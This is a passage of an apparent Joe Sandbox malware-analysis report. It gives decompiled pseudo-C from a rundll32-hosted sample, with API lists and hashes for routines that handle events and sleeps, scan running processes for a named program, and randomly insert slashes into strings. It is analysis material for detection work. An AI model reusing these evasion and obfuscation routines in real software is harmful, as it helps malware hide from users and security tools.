						E02E317D5(_a16, _a4);
						E02E371DF(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02E382AA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02E382A4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E02E33506(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E02E35422(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02E34CD2(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2e3a1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02e319d4
0x02e319e0
0x02e319e6
0x02e319eb
0x02e319ef
0x02e31b61
0x02e31b65
0x02e31b65
0x02e319f5
0x02e319f9
0x02e319fd
0x02e31a00
0x02e31a0b
0x02e31a11
0x02e31a16
0x02e31a19
0x02e31a33
0x02e31a42
0x02e31a4e
0x02e31a58
0x02e31a5d
0x02e31a5f
0x02e31a62
0x02e31b19
0x02e31b1f
0x02e31b30
0x02e31b43
0x02e31b59
0x00000000
0x02e31b5e
0x02e31a6b
0x02e31a72
0x02e31a76
0x02e31a7c
0x02e31a7e
0x02e31a80
0x02e31a82
0x02e31a84
0x02e31a8e
0x02e31a93
0x02e31a95
0x02e31a97
0x02e31a98
0x02e31a99
0x02e31a9a
0x02e31aa1
0x02e31aa8
0x02e31aab
0x02e31aab
0x02e31a78
0x02e31a78
0x02e31a78
0x02e31ab3
0x02e31abb
0x02e31ac7
0x02e31acc
0x02e31acc
0x02e31ad1
0x00000000
0x00000000
0x02e31ad3
0x02e31ad6
0x02e31ae3
0x00000000
0x00000000
0x02e31ae5
0x02e31ae5
0x02e31af2
0x02e31acc
0x02e31ad1
0x00000000
0x00000000
0x00000000
0x02e31ad1
0x02e31afc
0x02e31aff
0x02e31b02
0x02e31b09
0x02e31b09
0x02e31b16
0x00000000
0x02e31b16
0x02e31a02
0x02e31a06
0x02e31a07
0x02e31a09
0x00000000
0x00000000
0x00000000
0x02e31a09
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02E31A84
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02E31A9A
memset.NTDLL ref: 02E31B43
memset.NTDLL ref: 02E31B59

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: d6580e0c660c33c47ddd237f6992e20b1b273eeba375073fcb8f8890be4cee99
Instruction ID: 36e06a8ec24f672c304ec1de1159193116df593776ba6e16ba58dd19158328a9
Opcode Fuzzy Hash: d6580e0c660c33c47ddd237f6992e20b1b273eeba375073fcb8f8890be4cee99
Instruction Fuzzy Hash: 7241B331A40219ABDF12DE68CC48BDE77B6EF45316F009569F8099B280EB709E44CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02E3797A Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02E3797A(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2e3a310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2e3a348; // 0x206d5a8
				_t3 = _t8 + 0x2e3b87a; // 0x61636f4c
				_t25 = 0;
				_t30 = E02E36702(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2e3a34c, 1, 0, _t30);
					E02E3789E(_t30);
				}
				_t12 =  *0x2e3a2fc; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02E37256() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02E33BF0(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2e3a124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02E35854(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02e3797b
0x02e37982
0x02e3798c
0x02e37990
0x02e37996
0x02e379a5
0x02e379ac
0x02e379b0
0x02e379c2
0x02e379c4
0x02e379c4
0x02e379c9
0x02e379d0
0x02e37a27
0x02e37a27
0x02e37a2d
0x02e37a2f
0x02e37a2f
0x02e37a39
0x02e37a3d
0x02e37a4f
0x02e37a4f
0x02e37a53
0x02e37a59
0x02e37a59
0x00000000
0x02e379e9
0x02e379ee
0x02e379f6
0x02e379fa
0x02e379fe
0x02e379fe
0x02e37a0b
0x02e37a0f
0x02e37a13
0x02e37a68
0x02e37a6e
0x02e37a6e
0x02e37a21
0x02e37a25
0x02e37a5c
0x02e37a5e
0x02e37a61
0x02e37a61
0x00000000
0x02e37a5e
0x02e37a25
0x00000000
0x02e37a0f

APIs

Part of subcall function 02E36702: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,04EA9DC0,00000000,?,?,69B25F44,00000005,02E3A00C,4D283A53,?,?), ref: 02E36738
Part of subcall function 02E36702: lstrcpy.KERNEL32(00000000,00000000), ref: 02E3675C
Part of subcall function 02E36702: lstrcat.KERNEL32(00000000,00000000), ref: 02E36764

CreateEventA.KERNEL32(02E3A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02E368D0,?,?,?), ref: 02E379BB

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

WaitForSingleObject.KERNEL32(00000000,00004E20,02E368D0,00000000,00000000,?,00000000,?,02E368D0,?,?,?), ref: 02E37A1B
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02E368D0,?,?,?), ref: 02E37A49
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02E368D0,?,?,?), ref: 02E37A61

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 2ebc996009668b74039b310e13c205a1e35cae9e1863b3ca73136f5f3332e6dc
Instruction ID: 611fe5c8fefa9f1c1ffe27df32a3634c3fbee1cd8b31785050d67efd933c8ebe
Opcode Fuzzy Hash: 2ebc996009668b74039b310e13c205a1e35cae9e1863b3ca73136f5f3332e6dc
Instruction Fuzzy Hash: C4214DB29D03115BCB235A654C4CB6BF3E9EF4871BF02A528F985D7200D770CA44CA40

Uniqueness

Uniqueness Score: -1.00%

Function 02E36821 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E02E36821(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02E36413(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E02E314E2(_t23);
						}
					}
					return _t38;
				}
				if(E02E31CE6(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2e3a34c, 1, 0,  *0x2e3a3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02E3155C(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02E32331(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02E31544(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02E3797A( &_v32, _t39);
					goto L13;
				}
			}

0x02e36821
0x02e3682e
0x02e36834
0x02e36835
0x02e36836
0x02e36837
0x02e36838
0x02e3683c
0x02e36848
0x02e3684c
0x02e368d4
0x02e368d4
0x02e368d7
0x02e368d9
0x02e368e1
0x02e368e7
0x02e368ea
0x02e368ea
0x02e368e7
0x02e368f5
0x02e368f5
0x02e3685f
0x02e36861
0x02e36861
0x02e36878
0x02e3687c
0x02e3687f
0x02e3688a
0x02e36891
0x02e36891
0x02e3689a
0x02e3689e
0x02e368ac
0x02e368a0
0x02e368a0
0x02e368a1
0x02e368a2
0x02e368a3
0x02e368a4
0x02e368a5
0x02e368a5
0x02e368b1
0x02e368b4
0x02e368b8
0x02e368ba
0x02e368ba
0x02e368c1
0x00000000
0x02e368c3
0x02e368c3
0x02e368d0
0x00000000
0x02e368d0

APIs

CreateEventA.KERNEL32(02E3A34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 02E36872
SetEvent.KERNEL32(00000000), ref: 02E3687F
Sleep.KERNEL32(00000BB8), ref: 02E3688A
CloseHandle.KERNEL32(00000000), ref: 02E36891

Part of subcall function 02E3155C: WaitForSingleObject.KERNEL32(00000000,?,?,?,02E368B1,?,02E368B1,?,?,?,?,?,02E368B1,?), ref: 02E31636

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: e7eb8bb2c463cc9af5436b2e1230a05747425515c7e11a73bbc9a5f0cd58d016
Instruction ID: 7dc34bd60186c006d310307b95e76a59f6c7e56c3ecc607e98bfe59950f27f4d
Opcode Fuzzy Hash: e7eb8bb2c463cc9af5436b2e1230a05747425515c7e11a73bbc9a5f0cd58d016
Instruction Fuzzy Hash: AB21C573D80219BBCB12AFF5C48C9DEB7BDAB48356B01D425FA55A7100D7709944CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02E36643 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02E36643(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02E37A71(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02e3664f
0x02e36653
0x02e36654
0x02e36655
0x02e36657
0x02e36659
0x02e3665c
0x02e36661
0x02e366f8
0x02e366ff
0x02e366ff
0x02e3666a
0x02e36671
0x02e36681
0x02e36681
0x02e36687
0x02e36689
0x02e3668e
0x02e36697
0x02e3669d
0x02e366a2
0x02e366ad
0x02e366b1
0x02e366b3
0x02e366b4
0x02e366bd
0x02e366c1
0x02e366d2
0x02e366c3
0x02e366c8
0x02e366cd
0x02e366dc
0x02e366dc
0x02e366b1
0x02e366e2
0x02e366e8
0x02e366e8
0x02e366f1
0x02e366f6
0x02e366f6
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02E36671
lstrlenW.KERNEL32(?), ref: 02E366A7
memcpy.NTDLL(00000000,?,?,?), ref: 02E366C8
SysFreeString.OLEAUT32(?), ref: 02E366DC

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: ab603b6ba339723c0febe6880a3ca7f7dde86ba8657ed42c14d62cb078d39eed
Instruction ID: f751f951088671b45e875d16a96b65be364d13d968a8d3814fff593a6faf7f40
Opcode Fuzzy Hash: ab603b6ba339723c0febe6880a3ca7f7dde86ba8657ed42c14d62cb078d39eed
Instruction Fuzzy Hash: 4F216075941209FFCB12DFB4C98899EBBB9FF48346B1081A9E902A7210E770DA40CF54

Uniqueness

Uniqueness Score: -1.00%

Function 02E35454 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02E35454(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2e3a2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2e3a2f0; // 0xee78fd28
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2e3a2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02e3545c
0x02e3545f
0x02e35465
0x02e3547d
0x02e3547f
0x02e35484
0x02e35486
0x02e35489
0x02e3548b
0x02e3548e
0x02e35490
0x02e35490
0x02e35492
0x02e3549d
0x02e354a2
0x02e354b3
0x02e354bb
0x02e354c0
0x02e354c3
0x02e354c6
0x02e354c8
0x02e354cb
0x02e354ce
0x02e354ce
0x02e354d1
0x02e354dc
0x02e354e1
0x02e354eb

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02E32314,00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E3545F
RtlAllocateHeap.NTDLL(00000000,?), ref: 02E35477
memcpy.NTDLL(00000000,04EA9600,-00000008,?,?,?,02E32314,00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E354BB
memcpy.NTDLL(00000001,04EA9600,00000001,02E33831,00000000,04EA9600), ref: 02E354DC

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 7edb898219381dfaaabf26301b008ff6f78d1f2a9a4616e23b56a09201985ee4
Instruction ID: f5686a809f7a8dc1f9fccd9e68d3396f62d81669fc90fd8a059142c954a96b87
Opcode Fuzzy Hash: 7edb898219381dfaaabf26301b008ff6f78d1f2a9a4616e23b56a09201985ee4
Instruction Fuzzy Hash: D4110672A80218AFC711CB6ADC8CD9ABBEAEB84362B544176F40597350E7719E50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E35854 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02E35854(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t28 = E02E35E6F(_a4, _t26, __edi);
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0x2e3a348; // 0x206d5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t7 = _t18 + 0x2e3b4e0; // 0x70006f
						_t19 = _t7;
					} else {
						_t6 = _t18 + 0x2e3b904; // 0x750072
						_t19 = _t6;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E02E32058();
					_push( &_v64);
					if( *0x2e3a100() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E02E32058();
				}
				return _t28;
			}

0x02e35854
0x02e3585b
0x02e35869
0x02e3586d
0x02e35877
0x02e3587c
0x02e35881
0x02e35886
0x02e35890
0x02e3589a
0x02e3589a
0x02e35892
0x02e35892
0x02e35892
0x02e35892
0x02e358a0
0x02e358a6
0x02e358a7
0x02e358aa
0x02e358ad
0x02e358b0
0x02e358b8
0x02e358c1
0x02e358c9
0x02e358c9
0x02e358cb
0x02e358cd
0x02e358cd
0x02e358d7

APIs

Part of subcall function 02E35E6F: SysAllocString.OLEAUT32(00000000), ref: 02E35EC9
Part of subcall function 02E35E6F: SysAllocString.OLEAUT32(0070006F), ref: 02E35EDD
Part of subcall function 02E35E6F: SysAllocString.OLEAUT32(00000000), ref: 02E35EEF

memset.NTDLL ref: 02E35877
GetLastError.KERNEL32 ref: 02E358C3

Strings

@MqtNqt, xrefs: 02E358C3
<, xrefs: 02E35886

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: AllocString$ErrorLastmemset
String ID: <$@MqtNqt
API String ID: 3736384471-349977332
Opcode ID: 4317b59e88b7a82cff9714a7d2ccaf7aed50497f4e94370ebffd404106d696b2
Instruction ID: 7c4e9d02bf606776f89dd35a8d11996a5cf9479f7f89dc9e51f09c932d346c7c
Opcode Fuzzy Hash: 4317b59e88b7a82cff9714a7d2ccaf7aed50497f4e94370ebffd404106d696b2
Instruction Fuzzy Hash: 88014071D8021CABDB11EFA5D888EDEBBF8AB08746F859425F904E7200E7709944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E37256 Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02E37256() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2e3a348; // 0x206d5a8
						_t2 = _t9 + 0x2e3bea8; // 0x73617661
						_push( &_v264);
						if( *0x2e3a12c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02e37261
0x02e3726b
0x02e3726f
0x02e37279
0x02e372aa
0x02e37280
0x02e37285
0x02e37292
0x02e3729b
0x02e372b2
0x02e3729d
0x02e372a5
0x00000000
0x02e372a5
0x02e372b3
0x02e372b4
0x00000000
0x02e372b4
0x00000000
0x02e372ae
0x02e372ba
0x02e372bf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02E37266
Process32First.KERNEL32(00000000,?), ref: 02E37279
Process32Next.KERNEL32(00000000,?), ref: 02E372A5
CloseHandle.KERNEL32(00000000), ref: 02E372B4

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f0c0b93492f31ccc9f20851d0762f2b23314a665adef8337eac0003f22351815
Instruction ID: 100927e115b86a482f2fb9d7aab47f30fdaa047ae3dbdd5004eefbd9017ccf09
Opcode Fuzzy Hash: f0c0b93492f31ccc9f20851d0762f2b23314a665adef8337eac0003f22351815
Instruction Fuzzy Hash: D8F096B26C01186ADB22A6668C4CEEBB7ADEBC9357F015065F949C2100EB208596CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 02E37571 Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E37571(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}

0x02e3757b
0x02e3757f
0x02e37594
0x02e37596
0x02e3759b
0x02e375a1
0x02e375a3
0x02e375a8
0x02e375b3
0x02e375aa
0x02e375aa
0x02e375aa
0x02e375a8
0x02e375c1

APIs

memset.NTDLL ref: 02E3757F
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,747581D0,00000000,00000000), ref: 02E37594
CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02E375A1
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,02E33897,00000000,?), ref: 02E375B3

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: CreateEvent$CloseHandlememset
String ID:
API String ID: 2812548120-0
Opcode ID: ca9c5f4f8f87c0bcb2db459fd93a67566650d53c20fa15a17fec555811c184cb
Instruction ID: 7eeb6f026947dbf2a68c43484a181d8ac4878245c61ab5e4a3559fec5cd18403
Opcode Fuzzy Hash: ca9c5f4f8f87c0bcb2db459fd93a67566650d53c20fa15a17fec555811c184cb
Instruction Fuzzy Hash: 1AF03AF658430CBFD2106F629CC8827FBACEB8219EB11992EF54682101D771A859CEB0

Uniqueness

Uniqueness Score: -1.00%

Function 02E375C2 Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E375C2() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2e3a30c; // 0x2c0
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2e3a35c; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2e3a30c; // 0x2c0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2e3a2d8; // 0x4ab0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x02e375c2
